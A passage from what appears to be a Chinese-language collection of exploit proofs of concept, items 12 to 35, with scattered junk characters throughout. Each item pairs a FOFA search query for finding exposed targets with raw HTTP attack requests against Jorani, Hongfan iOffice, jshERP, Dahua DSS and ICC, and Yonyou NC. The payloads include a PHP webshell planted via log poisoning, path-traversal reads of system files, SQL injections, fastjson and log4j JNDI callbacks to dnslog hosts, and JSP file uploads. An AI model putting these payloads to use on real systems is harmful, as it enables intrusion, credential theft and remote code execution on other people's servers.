Cache-Control: no-cache- r8 Z1 A) c, o0 w- a. w
Upgrade-Insecure-Requests: 1
/ S! g N2 L2 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 k9 f7 N+ }8 M! L" n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 u1 P) G$ M8 T8 y. {7 D
Accept-Encoding: gzip, deflate5 D/ s$ N' \4 V4 j& Z% T; k; ]; T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.85 [! t$ O# d* V. n% \2 Q |
Connection: close, a$ |1 h* Z! i5 \* p7 x2 u& `2 U
$ v7 @: O0 r1 k. I# h
, g8 K( K; i. u' m12. Jorani < 1.0.2 远程命令执行" g1 Z$ N& \& H) m8 G/ q1 m3 ~
FOFA:title="Jorani"
* |6 P4 k( r8 F第一步先拿到cookie1 Q* B: L3 T5 M# K+ T2 t
GET /session/login HTTP/1.1! h) D" K) B8 v/ i3 k8 A7 l+ B
Host: 192.168.190.30' y# M: L: `+ O1 G: M( B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.368 t: d% g# ~1 K1 E5 L! f
Connection: close& x, G: m; ]8 E2 i1 j
Accept-Encoding: gzip- P/ f5 z* P6 N9 \
; @3 U, p& o% \' j Q6 {
$ I3 x! H/ v4 o5 d. U响应中csrf_cookie_jorani用于后续请求9 a& M6 X& P6 z: Y
HTTP/1.1 200 OK
3 d7 W+ l+ c; r, K1 l* tConnection: close. w2 ~6 C( j2 t9 A: d+ _, I+ g
Cache-Control: no-store, no-cache, must-revalidate
" [$ D9 M0 B/ W) d: _2 g% c" zContent-Type: text/html; charset=UTF-8- x/ t. {" s/ D* a
Date: Tue, 24 Oct 2023 09:34:28 GMT. m4 T! Y- Z) Y! n" e
Expires: Thu, 19 Nov 1981 08:52:00 GMT# s$ A) l/ c! t% T
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 T; K1 |- B, o& {+ V& |) B$ @/ Y$ yPragma: no-cache
- s( I x# K0 M% Y3 A8 OServer: Apache/2.4.54 (Debian)
/ ^, w8 c9 Y8 G3 c _Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/3 M0 A0 v3 \( x, F( S7 ^9 X
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
" \- F5 o% l2 P# ~Vary: Accept-Encoding
# {1 g$ `* B4 Q$ c: l
8 ^0 M t' B1 O7 V$ O
& M3 b$ ]1 F7 u8 ?, TPOST请求,执行函数并进行base64编码
7 k& v2 H4 c1 G; T8 pPOST /session/login HTTP/1.13 `1 o- \; z8 N' W/ D
Host: 192.168.190.303 T6 E1 f4 _1 ~1 T5 K3 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
! B$ e( Z" o8 d1 _' i Y" r/ ZConnection: close( }4 Y8 a/ \7 ?( s. j
Content-Length: 252! u" v5 P( `1 o- j* \9 ?0 ~. v
Content-Type: application/x-www-form-urlencoded0 P2 I9 A4 c: `, b2 ?* C
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r. v4 _7 W9 ~8 i) p5 G
Accept-Encoding: gzip( a6 z9 U. F' Y
; |, W. Y) C4 Qcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor; W% ], _5 I3 R5 _- P
7 `% t8 G' G+ R- ^
- G* \2 {, x1 m
: K: r0 m( C" G# M& s' z6 M! P* z向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
5 h; Z# k" o5 q R, ZGET /pages/view/log-2023-10-24 HTTP/1.1
% h' N! T, G( iHost: 192.168.190.30
* m9 L9 n! S6 `) R* g& _. Z/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 J s- O0 U9 {9 X3 K3 N" VConnection: close
( T: ^6 S, f# s% w8 Z gCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
- v. |; k' i; S7 D. VK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: N% V& b' ~2 s9 k4 J- i7 cX-REQUESTED-WITH: XMLHttpRequest
% r7 {! n9 X% Y# R9 @- X! UAccept-Encoding: gzip4 r$ D' q! }; u8 w- G8 R. o) \
; A- `+ }4 O# B* j
! M5 s( g5 G" {9 S* S1 n/ H% F$ H# v13. 红帆iOffice ioFileDown任意文件读取2 c u( f( ^) N: P I' i$ k
FOFA:app="红帆-ioffice"
( B( N2 [) X$ OGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1 {0 ~+ a: q, K1 M6 R7 e
Host: x.x.x.x' P' u+ z& _$ g( V4 E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' \2 L4 X1 _0 g. D) \$ DConnection: close
7 W) A/ j- r$ s8 ^5 B% {+ C" ?Accept: */*
, t! K6 v b) S: L8 k/ |Accept-Encoding: gzip* {; U h$ q( B) O/ i8 o
" S5 I# D7 u8 K
3 l2 ?% N* r% Q2 L, T4 v E
14. 华夏ERP(jshERP)敏感信息泄露: h- s' h3 z4 @ \2 t' {
FOFA:body="jshERP-boot"
, \) ~! e3 m$ p/ _泄露内容包括用户名密码
; `# N \7 g- T J1 B4 P' kGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
8 `- k# x! t) @: W0 YHost: x.x.x.x
* a( h9 r" D. u, v" l. c1 {( Y2 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
& N5 F* y3 R. LConnection: close1 r% q' }1 O& \
Accept: */*
& W" G6 K ^" {, b# c- H; x: U8 fAccept-Language: en
) u' [* N; d; oAccept-Encoding: gzip
$ W8 }" e* g3 t( P1 F0 j; l+ P1 O4 |$ P G
, ~% @6 v [5 N3 F15. 华夏ERP getAllList信息泄露6 j& o: N ?. E; ~' }8 t9 u1 n% _
CVE-2024-04902 f" @9 I4 E }
FOFA:body="jshERP-boot"
% T/ L1 x% u2 X2 _* f. l泄露内容包括用户名密码
: ?7 Z: ^7 {. r! k' XGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
. R) {3 ?, @* X0 v8 x+ kHost: 192.168.40.130:100! a: v# N G# ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
7 e) ]2 |! @4 ?" c7 h; k/ hConnection: close
u( J/ y( L# `) `* }Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
- E# q" l4 ]; |. ~3 Q; ^& QAccept-Language: en
0 d1 J7 J$ J9 \ h4 X8 ysec-ch-ua-platform: Windows7 @: Y/ c: }6 ?: {+ T
Accept-Encoding: gzip
" N, v2 C% ]9 g8 E! P6 k
7 S3 ]! G- I! K7 C! L" Z; }$ A/ M4 j ~, C
16. 红帆HFOffice医微云SQL注入
4 S! c! [( k2 D1 ^; B0 dFOFA:title="HFOffice"9 `' V$ F1 ~9 W; ^( ?
poc中调用函数计算1234的md5值
; F g- f7 Z# w8 i; b( B: l1 G) NGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
9 }; N, g: v) M& O( I) e. yHost: x.x.x.x: t) U5 g/ D8 v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' ~ Z5 J2 i& X- ~Connection: close
6 |- r. g! O" ^$ @2 vAccept: */*
$ R1 L5 x4 W) \Accept-Language: en1 m# h8 [2 P0 B. ]4 s" A
Accept-Encoding: gzip, k1 {, e% `' w2 R
2 w x6 v3 c4 R* [! S' T4 h
! _+ h" r1 e0 W) x: V% i5 W
17. 大华 DSS itcBulletin SQL 注入
$ d0 N' D" N) H+ DFOFA:app="dahua-DSS"
: F/ w( z3 |( H* U% kPOST /portal/services/itcBulletin?wsdl HTTP/1.1
$ S+ r* x0 G: B0 J" T1 zHost: x.x.x.x
" N- I$ b0 L% q3 M6 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- v Q3 p5 m9 LConnection: close) F5 s2 N: f) P! c4 O8 k
Content-Length: 345
: ]2 x! F" K, @% c( g- H p% |Accept-Encoding: gzip
6 e7 @7 L- x1 K5 Q+ Q3 h. I7 M7 {4 a1 p: _+ d# h' d
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>$ J2 U P% C% ] _; [3 }% h
<s11:Body>
% G: _8 n1 J! J8 G9 R0 E <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
0 K2 f, Q5 U7 N% z <netMarkings>
& U' k6 s z" \8 O- z) b (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: {. b, W7 Z; C& j, x4 p! `( d </netMarkings>
( d9 C# f5 v' g5 q6 V, z4 a </ns1:deleteBulletin>
! h2 F3 w7 ]; d. Y3 n </s11:Body>0 j3 O5 w% c; e& \' U+ q( e' \
</s11:Envelope>
: M9 e2 X" m' a$ g/ M- s2 A& ]7 b$ Y& K
) s& O- `* B# O+ q' q- l8 G
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
) {+ q* }2 q- N, e2 a: N) aFOFA:app="dahua-DSS"
* T% T" U0 D ]/ l! T jGET /admin/cascade_/user_edit.action?id=1 HTTP/1.19 [0 D5 R( O. J( I
Host: your-ip; B8 a3 h* A6 v6 j$ q5 ^ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 p$ m1 D# @: z$ |# D ?
Accept-Encoding: gzip, deflate2 q0 O' G. A8 N2 r0 y
Accept: */*
* j$ F* |! P$ O2 S/ j" z N! hConnection: keep-alive
+ b& u, p4 ?7 a$ L& x) {* M6 @8 F+ N7 }3 Q/ w" c2 t, ]: @
% p1 Z+ V$ E+ b3 \8 ~0 u
# g8 M. O9 P+ q- Q8 L; w! c
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 s$ p4 i7 O9 X* k1 x; ?FOFA:app="dahua-DSS"
- P' S6 J6 a5 I: W2 T1 r$ K" pGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
; o8 w% \# Y" C# y+ c& nHost:
8 t4 I& l2 R. [6 \# YUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* k; h* w$ U# F1 C1 l1 y1 k
Accept-Encoding: gzip, deflate% |; H1 l& [; \: l, {
Accept: */*: r7 c- S! o8 ~; c+ A% p N( Q% [
Connection: keep-alive
: L6 g. U0 H0 q* Q( ]' A1 j) ]1 A" n3 m3 d
6 X: m( b8 d4 W- C; f20. 大华ICC智能物联综合管理平台任意文件读取
6 _9 z% k4 m# o/ C6 M' c0 JFOFA:body="*客户端会小于800*"
% G% l% V% b4 H5 ~" |GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 [, Z) X( P, J3 H
Host: x.x.x.x( ~5 H1 r9 V8 C M7 I
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' Y2 s* G; f {7 n: x$ {Connection: close/ ~! g. O7 q# J% u" }0 d
Accept: */*# d4 {" c. H4 {
Accept-Language: en
G% u9 S( O0 N. V6 a" {) l% WAccept-Encoding: gzip! d. _: d- v+ z
/ @! D" O( J: Y1 H7 i
- [$ _, i3 G& h- W1 q. x! S21. 大华ICC智能物联综合管理平台random远程代码执行( P: g% J& G- c* C% e
FOFA:icon_hash="-1935899595"
9 {( g5 W5 @8 i3 f) uPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 ?2 M) y8 A7 R% |) g5 C* _
Host: x.x.x.x8 Q) G' G1 Z# e* K, m; u; S+ I4 d9 _- ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 t( Q6 f' s7 H; r9 ^; ]9 t2 vContent-Length: 1612 x" U' y1 R3 X
Accept-Encoding: gzip! W& n5 _! k+ p
Connection: close+ b) M5 A+ w) B1 t2 ~& a
Content-Type: application/json;charset=utf-80 w' A2 @( w2 ~4 r% Z) E
( ~* o2 X& K, x{/ y& b U+ ~2 V( m2 k; Y' w! [
"a":{
$ c# L, O' E5 x5 H# g4 K) I6 R9 K "@type":"com.alibaba.fastjson.JSONObject",6 a. @* M) E% d; X, P' d* |
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
+ W3 z. F$ w% X; Y }""
% d1 O4 q2 J/ M; z/ Z}
4 Z7 C; I% ^; t/ t- H! ?
% a6 E$ D6 k* b6 f* B0 u
- j6 P3 f# G8 _* B0 ]" f22. 大华ICC智能物联综合管理平台 log4j远程代码执行7 a: F8 _' i) a, X
FOFA:icon_hash="-1935899595"
" M0 p) h9 v1 W, h9 ]3 \" r8 BPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
, J* Y/ X) {% S+ aHost: your-ip5 R, ?4 _" V+ ]# Z; i4 m. r. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ c7 _' y0 @$ A5 m K9 pContent-Type: application/json;charset=utf-8
+ u& N. _' f/ m9 \0 {; R* j3 v* T$ f1 q2 E8 S7 a
{/ t9 [- n7 d7 _0 D+ H
"loginName":"${jndi:ldap://dnslog}"" a/ A4 j' E5 a& x6 I
}
9 [0 B* Z, E4 ?% l& e% m/ T7 U
% c+ `. h: u: C% |; j' @1 k ^7 b$ @. B2 X/ p# N6 e
$ J& }1 S, e ~: I" D, ~1 O1 K# \# X; S
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行; d5 P9 q2 H) V
FOFA:icon_hash="-1935899595"
: k# \' ~4 v" o- Y0 c: b: V1 c# yPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1: J$ y# \, ~1 R V
Host: your-ip% z2 J0 ^$ R% H0 b) |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 T" W8 r; Y2 V4 r4 P- J0 U
Content-Type: application/json;charset=utf-8
8 {6 H- M0 Q' R9 aAccept-Encoding: gzip0 b& K. e$ |6 x9 t: _0 A' ?
Connection: close% x& |8 X2 {7 a& O# Y3 [, r
4 J/ n. _6 w, b& d
{
; y! S* F6 p$ c0 H "a":{$ @" [6 g2 R% A- H. a0 l1 Z7 y6 w( ~. a8 w
"@type":"com.alibaba.fastjson.JSONObject",+ J9 L$ @0 f; R, h' Z5 [
{"@type":"java.net.URL","val":"http://DNSLOG"}* y: g5 }2 _( C0 ?
}""8 C7 s, n+ T3 X8 O* F% T* o; D
}
( A9 I/ V# {, B8 L% R
2 X ?1 O. e+ m$ I) ]. X! Q( W
6 h4 |, p# k, E$ x! @/ n. Y24. 用友NC 6.5 accept.jsp任意文件上传
0 }* Q& z) W: _/ |1 N2 k1 TFOFA:icon_hash="1085941792"
; k* S% J6 {: G' H9 ]POST /aim/equipmap/accept.jsp HTTP/1.1" l. m6 A4 w% b
Host: x.x.x.x
! ^/ r' R* A1 _/ y0 iUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' {5 P- y; F7 C
Connection: close! g" m4 W% D! Q: C3 }
Content-Length: 449$ O# T0 f9 a5 B+ S& t
Accept: */*/ F k8 a2 E/ G( H# T! l
Accept-Encoding: gzip
: j" Y8 l4 n, |) Y8 C; g* b LContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! s( Q$ {% O, {
' c! j# p. j, s' E$ k8 W-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, L- S' `: ~ t
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"2 V' p9 j" Q3 Y0 N; \5 _& h. m- b
Content-Type: text/plain8 F. g& |1 H: [ M/ R5 g
& G0 j: y0 o7 L1 ? [<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>) n0 \( Q: B: Y8 B O9 e8 `
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" U- P0 q/ J8 n) @% F5 K& @
Content-Disposition: form-data; name="fname") C8 P3 X, q& o3 P T1 d. a2 I _0 z
; r$ O+ @# e; Z0 `\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
4 t# B2 g+ f) a" W-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--3 v2 f' Q8 l5 @7 {$ r4 w
0 n& b# \) n! @1 v6 d" R; X6 M3 p6 w" E' ~
25. 用友NC registerServlet JNDI 远程代码执行
; s1 Y0 J8 r( I- }0 S9 G+ fFOFA:app="用友-UFIDA-NC"/ h1 ]- K% g8 X/ E& ~8 |# E
POST /portal/registerServlet HTTP/1.1+ D! N, H0 s9 V# D c: R- u. B$ s
Host: your-ip( Q: I0 H' c- p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.07 b% V! p/ z' W! J. T x* y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9+ b+ e* J! T: P4 g V
Accept-Encoding: gzip, deflate
7 {7 P+ ]( v+ r0 A) PAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.68 o" w& |3 z* J: `% V# w1 n# j+ Y
Content-Type: application/x-www-form-urlencoded
6 f S2 H" J1 R: ?9 R2 X' P* ]4 f% Z; I6 F# ^9 v
type=1&dsname=ldap://dnslog5 E0 V7 [8 W: K g- j0 a1 X# W
8 [0 m/ b+ Z! a7 H7 U
( g; ^5 {( o3 P( u* h/ a8 D
, H* T! Q+ B, t# g+ L8 C+ y' ?
26. 用友NC linkVoucher SQL注入; T6 h$ p. P$ o! E& k
FOFA:app="用友-UFIDA-NC"
7 ?0 b3 l6 |$ e* A) }$ e" RGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: K8 H% w: f& N/ z9 H* C/ dHost: your-ip
8 M6 S- z$ c9 j. N& U1 d8 L3 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 o" z3 n4 P- ]6 j0 ^Content-Type: application/x-www-form-urlencoded
0 I/ v. r" {+ L$ K6 q8 t5 mAccept-Encoding: gzip, deflate: L+ F. |7 D' m0 {
Accept: */*6 M0 o: f V# Z1 @1 c
Connection: keep-alive
4 u+ L' A! @: b% Z3 M( F! g. J) ~9 ^' f
: l. _% k( P- @9 r7 K' F |$ e& V27. 用友 NC showcontent SQL注入. S. I% P, n. I7 u. d6 m
FOFA:icon_hash="1085941792"2 M' b# A# {' ?: @: K( E9 {3 i
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
( z! N: W- U, o* |7 t5 G% I$ pHost: your-ip9 i7 K) ]' k2 ?1 l2 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) T2 {+ s0 B6 v* Y1 B- D: V" h- qAccept-Encoding: identity/ g! j" i6 u0 N! y% m
Connection: close
: U8 g9 y7 V! g/ T" Q+ DContent-Type: text/xml; charset=utf-8
, p5 m9 i7 P I& W
; `( X& p' D, R/ {( z
" j6 s- `( [7 K( A' n28. 用友NC grouptemplet 任意文件上传
) O$ J4 s5 B6 ^1 @( t) Y/ kFOFA:icon_hash="1085941792"6 g- j* D [! {5 e
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
0 o' {& g9 ~- P8 `4 f. DHost: x.x.x.x' E# X$ g' o# W3 {% o, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
1 ?5 l- l% ~) m$ \, X' RConnection: close& d1 M2 ^% S( ~+ p& ]5 E, K
Content-Length: 268* r( w/ C9 D7 _5 i7 Z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 k2 f- |) v+ zAccept-Encoding: gzip) m2 K! f# T* p8 Z7 L9 N" R
2 e, g" L! \5 s' r$ T9 a- h' u
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk) [4 }) D% C- Z$ V, v$ h
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
. G" [5 S3 F3 ~6 S& AContent-Type: application/octet-stream D$ R3 J, ^, Q1 ~& l
! @3 m# G9 ?' }<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
z2 R- x# s/ w+ l6 B5 S% q4 _/ l( r, m------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
/ |- B- }6 _/ x- O9 L( o3 w& @ D7 j( r1 h' z2 Q J
$ C4 |( x) q: t# k5 v3 U" e9 x- I9 _
/uapim/static/pages/nc/head.jsp
; @4 [5 V) C8 d6 b* y q) t: q; b5 g5 C3 |
29. 用友NC down/bill SQL注入: V2 \, M9 w" u& Z9 R4 i
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
P* d5 Z) }3 }. v: e0 oGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" e1 t, t1 [: ^5 n/ ^% i
Host: your-ip @3 I5 l4 ~8 _& A. L1 `5 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 n& W3 `3 |3 [& b' WContent-Type: application/x-www-form-urlencoded) g& ?) b2 r: P
Accept-Encoding: gzip, deflate0 m/ I$ W1 _: P! M
Accept: */*6 q5 ]% N/ t, G) Z$ \
Connection: keep-alive
2 G: F3 v5 n' k$ ~2 f
: p/ S; r7 y" n, [: r v- ]$ u/ f; l1 v; ~
30. 用友NC importPml SQL注入
~! m7 |& m. D) s) u: yFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ D9 G a& [7 C" o% J
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
n0 y6 m: A( X! ~8 W2 q$ ZHost: your-ip& a2 U$ M- v, c3 Z9 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V* G; L; e" G% F) i) j8 w) |: j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ f/ M' ~/ a' a2 ?5 V8 F- x8 x% ?Connection: close
& g' B8 r1 S, [: t' e |3 Y, @: ~. K! f' e
------WebKitFormBoundaryH970hbttBhoCyj9V1 u0 v8 d: j% c( F1 A0 V' V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"" Y3 B7 \$ L" j! T( o7 s
Content-Type: image/jpeg8 N+ q) t( I/ }- V% C- i! d
------WebKitFormBoundaryH970hbttBhoCyj9V-- p* e. y! _' ]. h. O- [: x
8 l# q2 o- u$ p- W
# q0 p3 ]/ v/ Y31. 用友NC runStateServlet SQL注入
* ~- x( o, P- [, I4 q f, I* d7 Vversion<=6.5* U+ R: u8 ^) L8 D
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 y4 i- X0 g/ h6 L& U q6 r+ f
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 Q$ i0 w0 G4 u9 ]7 T# r$ F% VHost: host6 U! t. c8 p2 J+ K9 \9 j+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36+ }& F( w+ k6 `' w/ u
Content-Type: application/x-www-form-urlencoded
M' T) g9 O/ D' X4 a( z( y7 X* t$ Q. z+ z& _
* X2 v9 } g* h
32. 用友NC complainbilldetail SQL注入/ j% \$ T+ W4 R, _3 M+ F) d0 u
version= NC633、NC65: ]. K) ^2 L6 A! @7 D
FOFA:app="用友-UFIDA-NC"& n a4 Y0 g& L3 w' W, Y
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) N/ |% q8 p: b( b' ]Host: your-ip5 X2 p2 J; k$ D+ Q y" e3 E3 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- l, g. q/ L" K; L) n& RContent-Type: application/x-www-form-urlencoded0 y K6 a. D2 x I. n( _% h5 S
Accept-Encoding: gzip, deflate6 w6 f$ r6 @5 ?' H; _0 U: {3 C/ B
Accept: */*6 M+ @* x8 o. S# K+ j
Connection: keep-alive
" l4 P8 [) k& D0 {! w& m2 @3 P9 O J8 [0 k4 j3 I. \
9 f0 I0 l0 K/ |( n- r- Y* U
33. 用友NC downTax/download SQL注入) |1 i) B5 s j9 m7 }
version:NC6.5FOFA:app="用友-UFIDA-NC"
8 k% f5 a8 B3 YGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.10 y9 y& R1 Q0 l8 {; c) l6 [+ Q j
Host: your-ip
, Z- s# q& w- G9 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 d$ M Z* n3 S7 t/ f: yContent-Type: application/x-www-form-urlencoded
! G( F' I n. f) A( W, p7 XAccept-Encoding: gzip, deflate
3 ~4 X& G3 p7 F( e& h; ~+ QAccept: */*
) B. c6 M7 J9 jConnection: keep-alive! c5 t2 f" i+ k" b5 k, n7 G
/ B# W2 P3 M. c3 [3 |! y$ p& v* J5 }
$ ]* p7 _& s Q* g7 a4 U
34. 用友NC warningDetailInfo接口SQL注入. L. G6 |3 S4 I) v! N0 y; K
FOFA:app="用友-UFIDA-NC"8 C- t9 |; y, s7 N; P
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.14 w2 } B; E2 X: E6 [3 u2 q9 q
Host: your-ip6 ?( O) t$ a8 T; u$ Z- i7 c& N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
l1 c0 y" M5 m7 ?% g9 T& y# gContent-Type: application/x-www-form-urlencoded: D( {" O$ Y( V S1 l
Accept-Encoding: gzip, deflate
) m+ Z, O0 ` ~' S1 PAccept: */*! z) p6 F& S3 D
Connection: keep-alive
# ^7 q+ i( q& H- Z* g% \5 x+ K
0 U; p1 K: u- e* K1 v
% C+ X. l. L" I9 R& G35. 用友NC-Cloud importhttpscer任意文件上传2 j4 W6 @6 g7 a2 q1 R# d
FOFA:app="用友-NC-Cloud"
7 u! Y( L4 g8 }- P% b& R T3 EPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
) l; H* d6 L! H( Y' [. eHost: 203.25.218.166:8888, M. P# I: b1 x5 ]
